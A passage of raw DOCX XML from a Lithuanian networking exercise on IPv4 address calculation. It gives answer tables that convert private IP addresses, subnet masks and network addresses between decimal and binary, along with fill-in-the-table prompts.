              <w:t xml:space="preserve"> 10101100.00010000.00010010.10110111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="0C0B4BA4" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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1808A4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">10.86.252.17 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="353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105EA3" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00001010.01010110.11111100.00010001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28617D70" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193C510B" w14:textId="77777777" w:rsidR="009C1B1D" w:rsidRPr="005A5C28" w:rsidRDefault="009C1B1D"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10 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361A2B1" w14:textId="6BE3C23C" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="65E5125E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="532"/>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03AB49BB"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Aprašyma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D382DEC"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Dešimtainis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F46B044"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Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4BBE4E85" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="390"/>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FFE8F0B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">IP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3C26C3F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.145.29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4BF58CB" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10101100.00010000.10010001.00011101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="692A11B3" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>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ED717EF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask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CBE20EF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255.255.0.0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5026D5B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111.11111111.00000000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="37109CCF" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>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DF5F179" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Network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F3D6295" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 172.16.0.0</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0FBCDBC" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10101100.00010000.00000000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135C802D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užpildykite trūkstamus lentelių laukus: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3FF8DB5C" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="531"/>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EAE030E"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Aprašyma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4B81F94"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Dešimtainis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36A05565"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Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="706A7D07" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="390"/>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9041FD4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">IP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E45E5D4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.10.10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A8EB961" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11000000.10101000.00001010.00001010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4C8138B5" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>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04B57A0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask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56D6620" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255.255.255.0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0F39AA9" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111.11111111.11111111.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7FBA4C57" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>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4696693" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Network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A90E1AE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.10.0</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32EA69B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11000000.10101000.00001010.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="290FA31D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užpildykite trūkstamus lentelių laukus: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0FDEFC9E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="532"/>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7F14C9A"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Aprašyma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F148B35"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Dešimtainis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322D533C"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Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="08C4CFA1" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="388"/>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88DE860" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">IP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718A6CE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.68.210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7C41776" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11000000.10101000.01000100.11010010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="596E9D14" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>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15E0B17" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask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FDC1C4B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255.255.255.128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A361FCC" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111.11111111.11111111.10000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="67F90DA2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>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38CE0CC" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Network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E98A9B5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.68.128</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1B3560D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11000000.10101000.01000100.10000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="588CE2AE" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užpildykite trūkstamus lentelių laukus: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="58ED337B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="531"/>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2FE11D74"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Aprašyma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A33C8B9"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Dešimtainis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FA85C63"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Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7F61BC7A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="390"/>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EDCD6A5" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">IP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9232D11" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.188.15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584B6B2" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10101100.00010000.10111100.00001111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0B7B7331" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>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3889139" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
